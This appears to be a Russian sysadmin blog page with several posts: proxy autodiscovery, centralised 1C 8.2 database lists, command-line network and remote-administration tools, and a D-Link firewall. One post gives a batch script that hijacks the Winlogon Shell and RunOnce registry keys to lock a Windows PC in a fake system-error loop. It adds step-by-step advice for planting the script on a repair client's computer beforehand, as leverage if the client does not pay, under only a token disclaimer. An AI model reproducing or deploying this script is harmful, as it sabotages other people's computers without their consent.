Админская фамилия

Make Sysadmins Great Again

Автоопределение прокси в домене Windows

Автоматизация - дело хорошее. И автоматизирование всего и вся поможет улучшить жизнь системного администратора если не в текущий момент, то в обозримом будущем точно. Для этого решил я настроить автоконфигурирование настроек прокси-сервера на клиентских машинах.
Имеется апдейт!

Как прокси мы используем Usergate (будь он неладен. На человеческие прокси пока не могу уломать начальство). В нем есть свой DHCP сервер с нужной нам функцией. Но в качестве DHCP мы используем стандартные средства Windows Server, поэтому простой вариант с одной галочкой нам не подходит.
 Тут нам на помощь приходит протокол автонастройки прокси (
WPAD). Смысл его работы в следующем:


Wireshark для самых маленьких


О безопасных каналах для юных админов

Написано по-русски и понятно даже для неподготовленного пользователя.

Параллельно с развитием технологий защиты интернет-трафика от несанкционированного доступа развиваются и технологии перехвата защищенного трафика. Перехватить и изучить незашифрованный трафик пользователя уже давно не составляет труда даже для рядового юзера. Практически каждому известно слово «сниффер». Теоретически, защищенные SSL/TSL-соединения перехватить обычными средствами невозможно. Но так ли это?

На самом деле — не совсем так. Да, зашифрованный трафик теоретически невозможно расшифровать, хотя опять таки теоретически при очень большой необходимости и желании, и такой трафик можно расшифровать, подобрав ключ. Однако для этого нужны такие затраты ресурсов, что актуальность взлома сохраняется только, наверное, на правительственном или военном уровне :)


Бомба для недобросовестного клиента

Обратился ко мне один знакомый аникейщик. Он хотел, чтобы я написал скрипт, который будет как либо портить жизнь его клиентов, которые его кидают. Например, они согласились на ремонт и его оплату, т.е. согласились с суммой. Когда работа уже сделана, клиент выгоняет тебя, ничего не заплатив. Как с этим бороться? Я написал простой батничек. Вот его исходники:@echo offreg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v Shell /d %systemroot%\restore.bat /f >nulreg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce” /d %systemroot$\restore.bat /f >nulEcho Attention! Crytical system error! Kernel rebilding. Don`t touching a keyboard!:sysinf >nulsysteminfo >nulgoto sysinf >nulТеперь разберемся. Первые две строчки прописывают файл в реестр. Сначала для запуска вместо explorer.exe, а затем для единоразового автоматического запуска при старте системы (для любого пользователя). В конце всех строк, кроме первой и четвертой имеется параметр “>nul”. Этот параметр отвечает за отсутствие вывода результатов работы команд.Пятая строчка является меткой, по вызову которой следует незамедлительно мыполнить нижеследующие команды.Шестой строчкой я делаю запрос о состоянии системы. Т.е. какое железо и обновления установлены на компе. Команду можно смело сменить на другую. Было необходимо, чтобы были сменяющиеся надписи.Седьмая строка возвращает выполнение на метку (пятая строка) после выполнения шестой строки, что приводит машину к замкнутому циклу. По сути, появляется тот же самый порно баннер, только его можно закрыть. С другой стороны, после перезапуска он появится вновь.А вот второй код, убирающий действие первого.@echo offreg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v Shell /d explorer.exe /f >nulreg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce” /d   /f >nulСхема работы.1. Копируете первый батник (restore.bat) в папку виндоус на системе клиента. Внимание! Сделать это надо ДО начала платных работ.2. Запускаем его и как только появляется надпись, закрываем (значит, что ключи прописаны).3. Если вас выгоняют - просто уходим. Все работает до первой перезагрузки. Если все нормально - запускаем второй батник (называйте, как хотите). Он вернет систему в первоначальное состояние.Конечно, использовать его не надо. На самом деле, он необходим, чтобы вы знали, куда копать, если появится подобное. А также, чтобы понимали, что могут сделать люди, которых кинули. Поговорка “Скупой платит дважды” как раз про эту ситуацию.Отсюда


Управление списками баз 1С 8.2

Одно из правил управления временем — Если есть человек, которому можно делегировать выполнение задачи — делегируй.ПредысторияКак я докатился до того, что — Я, системный администратор! — стал задаваться вопросами работы 1С?Тирада в моей оригинальной статье, которую вряд ли кто читал, касалась того, какие лентяи 1С разработчики, и сами производители 1С, что одни понаделали много функций, но другие недостаточно хорошо описали, третьи поленились разобраться, а свалили всю рутину на системных администраторов, которым делать-то нечего, кроме как за элитой IT подметать. Думаю, здесь никто меня не похвалит за такие рассуждения. Хотя и похвалы особо не ищу. Единственная цель — чтобы это пригодилось кому-то, кто правильный лентяй-админ, и не любит заниматься одним и тем же помногу раз. А теперь о том, как это было.Я столкнулся с таким положением дел, что всем сотрудникам наши 1С разработчики добавляют базы ручками, присутствуя на рабочем месте сотрудника, либо просят это сделать нас удалённо, подключившись к рабочему столу пользователя и мышкакликанием все повторить.Выглядит это так:— Миша, добавь Васи Пупкину базу: 1C-server:1551 «buh_prod»— А как её назвать?— БухгалтерияИ не думайте, что в следующий раз, этот 1С разработчик скажет мне, что эту базу можно назвать именно также. Как следствие, у нас одна и та же база у разных сотрудников называлась по разному. Красота, не так ли?!Ещё одна сторона этой проблемы в том, что Сотрудник должен быть на месте, компьютер включен, и у него должно быть время (5 мин), чтобы я мог всё это сделать. Если сотрудника нет на месте, то вы можете себе предположить, сколько от меня требуется трудозатрат, чтобы выловить этого сотрудника, согласовать с ним время и сделать это. А если этот сотрудник в удалённом офисе, на ноутбуке, и бывает в сети крайне редко, плюс разница поясов Владивосток — Москва, то это ещё добавляет остроты ощущений. Конечно, можно ещё ярлыком в почту бросить, но этим у нас 1С разработчики очень крайне редко пользуются — или не умеют, или не хотят, или за нас переживают, что без работы останемся, за что им отдельная благодарность и лучи поноса.Баз у нас порядка пятнадцати. У каждой группы отдельный набор баз. А есть и такие, у кого строго индивидуальный список.Следующая картина вам ещё больше понравится.Поступает распоряжение от главы 1С’ников, что нужно трём отделам изменить базу, т.к. она переехала на другой сервер. Дальше не буду тратить буквы, т.к. всё что я описал выше множите на тридцать человек, двадцать из которых в другом офисе или даже другом городе. Классная задачка.Не помню, сколько раз, я, таких суматох вынес, но было их больше десяти. После чего мне стало интересно, какие способы оптимизации этого процесса есть по unix-way’ю.И стал я читать… Читал долго… Читал упорно… Документация 1С в справке мне совершенно не понравилась — написано так, как будто бы я уже это делал, поэтому большую часть идеи они оставляют между строк. Лучи поноса в написателей встроенной справки 1С. Как обычно это бывает, более-менее понятную инструкцию нашел на личном блоге, не помню уже кого.Теория устройства конфигурационных файловВ 1С организовано всё, что касается списков баз, в обычных текстовых, читаемых файлах с расширениями .cfg и .v8i, в кодировке utf-8. Так что, как вы наверняка догадываетесь, можно всё делать то же самое без отрыва пользователя, открывая файл по сети обычным текстовым редактором и правкой на прямую.Расположение файлов на стороне пользователяУ пользователя на компьютере 1С 8.2 хранит фалы списков баз в каталогах:Для Windows XP:Профиль всех пользователей: С:\Documents and Settings\All Users\Application Data\1C\1CEstart</span>Профиль пользователя: С:\Documents and Settings%username%\Application Data\1C\1CEstart</span>Для Windows 7:Профиль всех пользователей: C:\ProgramData\1C\1CEStart</span>Профиль пользователя: C:\Users%username%\AppData\Roaming\1C\1CEStart</span>Содержимое профиля пользователя — два файла: 1CEStart.cfg, ibases.v8i.Содержимое директории профиля всех пользователей — один лишь, 1CEStart.cfg.При запуске 1С берёт список баз к представлению в файле пользователя C:\Users%username%\AppData\Roaming\1C\1CEStart\ibases.v8i, но предварительно читает настройки сначала из профиля всех пользователей C:\ProgramData\1C\1CEStart\1CEStart.cfg, а потом и из профиля пользователя C:\Users%username%\AppData\Roaming\1C\1CEStart\1CEStart.cfg, и если в них есть ссылки на конфигурационные базы в сети, то добавляет их в этот файл.Описание файла 1CEStart.cfgВ профиле всех пользователей конфигурационный файл C:\ProgramData\1C\1CEStart\1CEStart.cfg имеет следующее содержание:InstalledLocation=C:\Program Files (x86)<span class=“number” style=“border: 0px; color: #2f98ff; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">1cv82InstallComponents=DESIGNERALLCLIENTS=1 THINCLIENTFILE=1 THINCLIENT=0 WEBSERVEREXT=0 SERVER=0 CONFREPOSSERVER=0 CONVERTER77=0 SERVERCLIENT=0 LANGUAGES=RUГде:InstalledLocation — содержит указание на каталог, в который выполнена установка 1С: Предприятие. По умолчанию это значение C:\Program Files (x86)\1Cv82.CommonCfgLocation — указывает путь и имя общего конфигурационного файла. Допускается наличие нескольких строк с таким параметром.CommonInfoBases — указывает путь и имя файла (.v8i) со списком общих информационных баз.DistributiveLocation — содержит указание на каталог, в котором будет производится поиск новой версии для автоматической установки.InstallComponents — В локальном конфигурационном файле (1CEStart.cfg) содержит перечень установленных компонент с признаком нужно установить компонету — 1, или нет — 0.Возможны следующие компоненты параметра InstallComponents:DESIGNERALLCLIENTS — все клиенты и конфигуратор.THINCLIENT — тонкий клиент для клиент-серверного варианта работы.THINCLIENTFILE — тонкий клиент с возможностью работы с файловыми информационными базами.SERVER — сервер 1С: Предприятия. Если программа установки запускается из программы запуска, то сервер будет установлен как приложение.WEBSERVEREXT — компоненты расширения для веб-сервера.CONFREPOSSERVER — сервер хранилища конфигураций 1С: Предприятия.SERVERCLIENT — компоненты для администрирования кластера серверов 1С: Предприятия.CONVERTER77 — конвертер информационных баз из версии 1С: Предприятия 7.7.LANGUAGES — список языков интерфейса для установки. Если указано несколько языков, они перечисляются через ”,”. Пример: LANGUAGES=RU,UK,BGВ профиле пользователя конфигурационный файл C:\Users%username%\AppData\Roaming\1C\1CEStart\1CEStart.cfg первоначально пустой. Но, если какие-то настройки необходимо сделать индивидуально для конкретного пользователя, то писать именно в него, и тут уже его ключи настроек будут иметь больший приоритет, но не все. Это отдельный вопрос, им я не буду сейчас захламлять голову.Описание файла ibases.v8iВторой важный файл информационных баз, который находится в профиле самого пользователя — C:\Users%username%\AppData\Roaming\1C\1CEStart\ibases.v8i. В него и собирается конечный список баз. Пример его содержимого:[PhoneBook]Connect=Srvr=“1C-server:1551”;Ref=“phonebook”;ID=34891493-907f-4783-8a37-3cbc092a989aOrderInList=16640Folder=/OrderInTree=16640External=1ClientConnectionSpeed=NormalApp=ThinClientWA=1Version=8.2[ITIL]Connect=File=”\Dvc-server\it\Equipment\Rarus\ITIL";ID=2829c91a-137f-457c-93fe-9e74c8ec5ee4OrderInList=16384Folder=/OrderInTree=256External=1ClientConnectionSpeed=NormalApp=AutoWA=1Version=8.2.14.540Где:[phonebook] – название базы 1С. Может быть как русскими буквами, так и английскими. Это то, что видит пользователь.Connect=Srvr=“1C-server:1551”;Ref=“phonebook”; - место хранения базы. | | | | | | | |- наименование базы на сервере 1С. | | |————- порт подключения, если отличается от стандартного. | |——————— адрес сервера. |—————————– тип подключения может быть: Srvr, File, ws - вэб-сервер.ID=34891493-907f-4783-8a37-3cbc092a989a — автоматически генерируемый уникальный код базы. Если у двух записей один и тот же ID, значит это одна база.OrderInList=16640 — порядок в списке баз, когда базы представлены одним общим списком без подкаталогов; этот параметр из сетевого списка синхронизируется только в чистый ibases.v8i, если в ibases.v8i пользователя уже заполнен этой базой и этот параметр не будет перезаписываться, при его изменении в сети.Folder=/ — задаёт место в дереве каталогов, если вид представления списка баз выставлен деревом; этот параметр имеет приоритет пользователя, и не меняется при изменении в сетевом конфиге.OrderInTree=16640 — порядок в дереве, когда список баз представлен в виде иерархии подкаталогов; этот параметр имеет также приоритет пользователя, и синхронизируется только при первом добавлении базы, а далее подлежит изменению только локальным пользователем.External=1 — внешняя подключаемая запись конфигурации или нет. Когда 0 тогда база присутствует только в этом файле. В данной ситуации эта запись импортируется из файла списка баз .v8i из сети. Это идентификатор, если это список баз расположенный в сети (расшаренный), то этот параметр можно вообще убрать из конфигурационного файла.ClientConnectionSpeed=Normal — скорость соединения клиента. Опции могут быть “Nofmal” и “Low”. Логика ясна и без моих поиснений. Этот параметр интерактивный и при сетевом размещении синхронизируется при каждом запуске 1С.App=Auto — тип соединения клиента. Бывает три типа:— Auto — определяется сервером;— ThinClient — тонкий клиент;— ThickClient — толстый клиент.Этот параметр интерактивный и синхронизируется при каждом запуске 1С.WA=1 — этот параметр говорит о том, что система должна использовать windows авторизацию. Этот параметр интерактивный и синхронизируется при каждом запуске 1С.Version=8.2 — используемая версия для этой базы. Если указать полностью конкретизируя какую платформу использовать, то будет использовать именно ту платформу, которую укажешь, как, например, во второй записи — Version=8.2.14.540. Этот параметр интерактивный и синхронизируется с сетевым конфигом при каждом запуске 1С.Также есть ещё такой параметр как DefaultApp — тип соединения клиента по умолчанию, если в конфигурации для базы не задан, и DefaultVersion — используемая версия по умолчанию, если не задано в конфигурации для базы. Этот параметр пользовательский, и синхронизируется в чистый файл базы при первом запуске. Далее этим параметром управляет локальный пользователь.Ссылки на конфигурационные файлы в сетиПрелесть всей этой схемы работы в том, что производители 1С предусмотрели возможность глядеть в конфигурационные файлы, расположенные в сети. Реализуется это путём правки:либо в конфигурационном файле всех пользователей C:\ProgramData\1C\1CEStart\1CEStart.cfg, если мы хотим показать базы для всех пользователей компьютера;либо в конфигурационном файле конкретного пользователя C:\Users%username%\AppData\Roaming\1C\1CEStart\1CEStart.cfg, если мы хотим показать базы только определённому пользователю на компьютере.А добавить можно параметры:либо CommonCfgLocation=\server\1C\config\bases.cfg — указывает путь и имя общего конфигурационного файла. Допускается наличие нескольких строк с таким параметром. Название файла не играет принципиального значения, лишь бы расширение сохранялось;либо CommonInfoBases=\server\1C\config\buh_bases.v8i — указывает путь и имя файла (.v8i) со списком общих информационных баз. Название файла не играет принципиального значения, лишь бы расширение сохранялось;или в комбинации и тот и другой, и помногу строк.Следует оговориться, что в сети мы должны разместить файлы с расширением .cfg и .v8i, и соответствующим наполнением.Идея использования возможностейИдея заключается в том, чтобы делать правки с наименьшим количеством повторений. Если настройки базы или её расположение на сервере поменялось, то, исправив запись один раз в одном месте, мы получим актуальную информацию на всех компьютерах.Для этого необходимо сделать шару в сети: \server\1C</code>. В этой шаре сделать, как минимум два каталога:..\bases</span>Листинг каталога:\server\1C\bases....base1.v8ibase2.v8ibase3.v8ibase4.v8iВ этом каталоге будут хранится файлы с расширением .v8i. Эти файлы будут иметь внутри себя настройки всего лишь одной базы для каждого файла. Причём указать следует только те параметры, настройки, которые критичны именно для этой базы, всё остальное автоматом подставится по умолчанию. Пример файла:[Название базы]Connect=ClientConnectionSpeed=NormalApp=AutoWA=1Version=8.2Следует избегать использования параметра ID, т.к. 1С разработчики используют для создания новой базы копипаст из имеющейся базы. А базы с одним ID будут конфликтовать...\groups</span>Листинг каталога:\server\1C\bases....buh.cfgfin.cfgmanagers.cfgВ этом каталоге будут храниться файлы с расширением .cfg. Эти файлы будут иметь внутри себя ссылки на базы в каталоге ..\bases. Пример файла:CommonInfoBases=\server<span class=“number” style=“border: 0px; color: #2f98ff; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">1C\bases\base1.v8iCommonInfoBases=\server<span class=“number” style=“border: 0px; color: #2f98ff; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">1C\bases\base2.v8iВ это каталоге мы создаём индивидуальные для группы пользователей или же для конкретного пользователя списки баз. Именно на файлы из этой группы мы ссылаемся в конфигурационных файлах операционной системы пользователя.При такой схеме мы выносим управление списками баз 1С пользователей в сеть для не администраторов. На сетевой каталог с конфигурационными файлами дать доступ 1С разработчикам и пусть играются как хотят.А если необходимо изменить настройки какой-то базы, то мы правим её всего одни раз в файле \server\1C\bases\base.v8i, и это отразится у всех пользователей, т.к. все пользователи смотрят информацию о базе именно в этом файле.РезультатРезультат такого построения конфигурационных файлов:Исправить название базы, место расположение, параметры запуска — всё можно сделать в одном месте и единожды.Унификация названия баз — все пользователи о базе знают по одному общему названию.Пользователь сам не сможет поломать конфигурационные настройки, т.к. они хранятся не на его компьютере.Процесс управления списком баз на компьютере пользователя можно вернуть обратно 1С специалистам.Возможность поправить конфигурационные файлы, даже если пользователь спит далеко за часовыми поясами, а компьютер на текущий момент выключен.P. S.Если вы думаете, что это было самой сложной частью работы, то вы глубоко ошибаетесь.Инструкция на корпоративной wiki, как это работает.Всяческое содействие при размещении конфигурационного файла, или базы, а также добавление пользователям нужных ссылок.Полгода на плавное приобщение к новой схеме работы.Эти факторы не помогли мне пересадить наших 1С’ников на удобную для них схему работы.Зато, я трачу на это значительно меньше времени.Репост с хабра


Ничего не значащая сертификация

Прошел несколько тестов.Хвалюсь http://certifications.ru/resume/155997/В тестах куча ошибок, недочетов и просто глупых вопросов. Например, о классах IP-адресации. Ребят, да эти классы устарели, когда я ещё компьютеров то не видел.


Несколько интересных ссылок

  1. Что читают сотрудники гугл2. Инструкции по созданию лабораторного окружения с Windows Server 2012 Hyper-V

Парочка видео по ИБ.

Покажите родителям и другим слабо понимающим безопасность.1. Мобильные угрозы2. Кибервойны.


Сила командной строки. Вводная.

Тру-админы знают, что все операции с компьютером можно произвести так, чтобы пользователь даже не знал о том, что с его компьютером что-то происходило. И даже иметь домен не обязательно. Для самых маленьких в этой статье я опишу наиболее часто используемые мной утилиты командной строки, а в будущем, возможно, буду обновлять этот пост.Для юных админов сразу хочется сделать мотивационный пинок: не бойтесь cmd! Это ваш лучший друг и соратник. Понимаю, что при первом запуске cmd вам очень страшно и бегут какие-то непонятные буквоцифры и Морфеуса нет рядом. К этому быстро привыкаешь, и потом уже паникуешь, когда cmd не свернут в панель задач. А чтобы прокачать скилы и убить страх - ставьте Linux без графической оболочки! А ещё можно запустить tracert ya.ru и с умным видом говорить начальнику, что тестируешь производительность сетевой подсистемы южного моста виртуального сервера баз данных, запущенного в облаке.Интерпретатор командной строки cmd запускается из меню Стандартные или набором волшебных трёх букв (угадайте каких!) в строке Выполнить. Откроется черное окошко с белым приглашением. Вся это красотень настраивается как душе угодно, но сейчас не об этом.Перейдем к командам. Про ping писать не буду - и так все знают. Скажу лишь, что при добавлении к команде символов /? можно узнать много нового.Команды для работы с сетьюipconfig /all - позволяет узнать сетевые настройки: MAC сетевушки, IP-адрес, адреса шлюза и DNS серверов.ipconfig /flushdns - очищает кэш DNS. При подозрениях на проблемы в работе DNS, первым делом запускайте эту команду.ipconfig /renew - обновляет настройки сетевого адаптера с DHCP-сервера.netstat - отображение статистики TCP/IP и текущих сетевых подключений. Имеет множество параметров.netstat -a - отображает все подключения и ожидающие порты.netstat -b - отображает процесс, ответственный за открытый портnetstat -p TCP - выводит данные только по TCP. То же самое есть по UDP и TCPv6, UDPv6.netstat -r - выводит таблицу маршрутизации.Я чаще всего пишу так netstat -an | findstr :80. Тут мы получаем список всех соединений с/на порт 80. И если они есть, следующим запросом можно уже поискать какая программа пытается соединиться netstat -anb.arp -a - отображение таблицы преобразования IP-адреса в MAC. Полезно, когда нужно узнать MAC удаленного компьютера по его IP или наоборот.nslookup - проверяет соответствие IP-адреса DNS-имени. Используется при определении неисправностей системы DNS.Ещё существует целый отдельный шелл для работы с сетью. Он так и зовется netsh (net shell). Его возможности огромны. Приведу лишь наиболее используемое.netsh winsock reset - сброс сокета. Т.е. мягкий сброс всех сетевых настроек. О более жестком сбросе здесь.netsh позволяет детально настроить сетевую конфигурацию или посмотреть определенные значения, даже недоступные в графическом интерфейсе. За более подробной информацией предлагаю обратиться к встроенной справке (netsh /?).Семейство утилит net позволяет подключать/отключать сетевые диски (net use), расшаривать ресурсы (net share), просматривать расшаренные ресурсы в сети (net view). Последняя команда помогает при непонятных проблемах с подключением к общим папкам - можно увидеть конкретную ошибку, которую не показывает GUI. Утилиты net позволяют работать не только с сетью, несмотря на название. Можно создать локального пользователя (net user username /add), добавить его в группу (net localgroup groupname username /add), запустить (net start servicename) или остановить (net stop servicename) службу. Предлагаю поближе познакомиться с этими утилитами и они окажут вам хорошую помощь. Ну а если будет время и желание, то я сам постараюсь подробнее расписать о них в следующих постах.Управление удаленным компьютеромМногие начинающие админы считают, что терминал это прошлый век и недооценивают его возможности, так как все нужные операции можно произвести из графического интерфейса. А знаете ли вы, что все эти операции можно произвести и на удаленном компьютере, причем абсолютно незаметно для пользователя и без применения средств удаленного администрирования вроде RAdmin и TeamViewer? Ведь зачем отрывать дорогого бухгалтера от расчета вашей зарплаты только для того, чтобы посмотреть запущена ли на его машина служба общего реестра? Можно ведь просто набрать в командной строке sc \buhpc query remoteregistry.Вообще утилита sc довольно мощная - с её помощью можно детально настраивать управление службами. И не только на удаленном компьютере.Для управления удаленной машиной я использую утилиты Sysinternals великого Марка Руссиновича. Чаще всего это PsExec. Она позволяет запустить командную строку или любой другой процесс на удаленной машине (psexec \remotepc cmd). А дальше делать с ней всё, что захочется. Для этого нам и нужна сила cmd.Управление принтерами - prnjobs. Сам ещё не юзал, но обязательно разберусь и отпишусь.Ну вот и назрела тема для нескольких следующих постов. Это sc, prn*, net, netsh, wmic и Sysinternals. Ждём продолжения!1, 2


Обзор и первоначальная настройка D-Link DFL-260e

Аппаратный файерволл D-Link DFL-260e используется в качестве пограничного звена между локальной сетью и Интернет.

Функций и производительности рассматриваемого файерволла вполне достаточно для обслуживания средней компании с числом активных пользователей сети около 100. 

Итак, что же умеет данная железяка.

  1. Port Based VLAN
  2. IDS/IPS
  3. Потоковое антивирусное сканирование
  4. Web-фильтр
  5. IPSec/PPTP/L2TP Server/Client
  6. Ну и стандартные плюшки в виде DHCP-сервера, гибкого файерволла и т.д.

При первом включении мастер просит нас задать пароль админа (дефолтный пароль стандартен для D-Link’a - admin, IP - 192.168.10.1), установить настройки SNMP сервера и настроить адреса интерфейсов - всё тривиально.